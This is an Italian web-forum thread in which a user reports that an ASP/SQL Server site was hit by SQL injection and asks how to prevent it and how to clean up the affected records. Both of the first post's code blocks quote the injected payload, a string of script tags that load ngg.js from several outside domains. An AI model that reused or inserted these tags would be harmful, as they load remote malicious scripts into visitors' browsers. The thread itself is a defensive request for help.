Visualizzazione dei risultati da 1 a 3 su 3
  1. #1
    Utente di HTML.it
    Registrato dal
    Jun 2003
    Messaggi
    605

    Problema SqlSever e SQL Injection

    Ciao a tutti, aprendo un'aplicazione in asp che tutto a un tratto non funzionava più.
    Mi sono accorto che il db sqlserver è pieno di record che sono stati aggiornati con questa riga:


    Codice PHP:
    <script src=http://www.gitporg.com/ngg.js></script><script src=http://www.adwnetw.com/ngg.js></script><script src=http://www.adpzo.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.bnrc.ru/ngg.js></script><script src=http://www.cgt4.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script><script src=http://www.kr92.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script> 
    ho visto che il problema è dovuto a sql injection.
    risporto un link trovato su google

    http://www.easynavigate.com/


    casomai può servir a qualcuno!!!!!


    CIoè delle istruzioni lanciate in querystring alla pagina che mi aggionarno il database.
    E volevo sapere come avete risolto per questo prblema e se almeno a qualcuno è capitato o sono l'unico sfigato.
    Di sicuro ci sarà un controllo sulle varibili.... (almeno per mysql è così....) ma per asp?

    E poi secondo voi come posso lanciare una query che mi pulisca questi record visto che nel campo congome posso avere tipo:


    Codice PHP:
    Mario Rossi<script src=http://www.gitporg.com/ngg.js></script><script src=http://www.adwnetw.com/ngg.js></script><script src=http://www.adpzo.com/ngg.js></script><script src=http://www.tctcow.com/ngg.js></script><script src=http://www.bnrc.ru/ngg.js></script><script src=http://www.cgt4.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script><script src=http://www.kr92.ru/ngg.js></script><script src=http://www.ncwc.ru/ngg.js></script> 
    grazie mille dell'aiuto.
    Una buona serata






  2. #2
    Utente di HTML.it L'avatar di yro
    Registrato dal
    Sep 2003
    Messaggi
    2,916
    se fai una ricerca ci sono tante discussione che parlano del problema e di come lo si risolve...

    per la query non saprei... forse utilizzerei un UPDATE con il like per il pattern... ma è da provare.
    E se avessi il dono della profezia e conoscessi tutti i misteri e tutta la scienza, e possedessi la pienezza della fede così da trasportare le montagne, ma non avessi la carità, non sono nulla.

  3. #3
    Utente di HTML.it
    Registrato dal
    Jun 2003
    Messaggi
    605
    grazie mille della tua risposta.... ho trovato delle funzioni ad ok sul forumma ancora non ho risolto con un update ad ok... qualche consgiglio?

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2026 vBulletin Solutions, Inc. All rights reserved.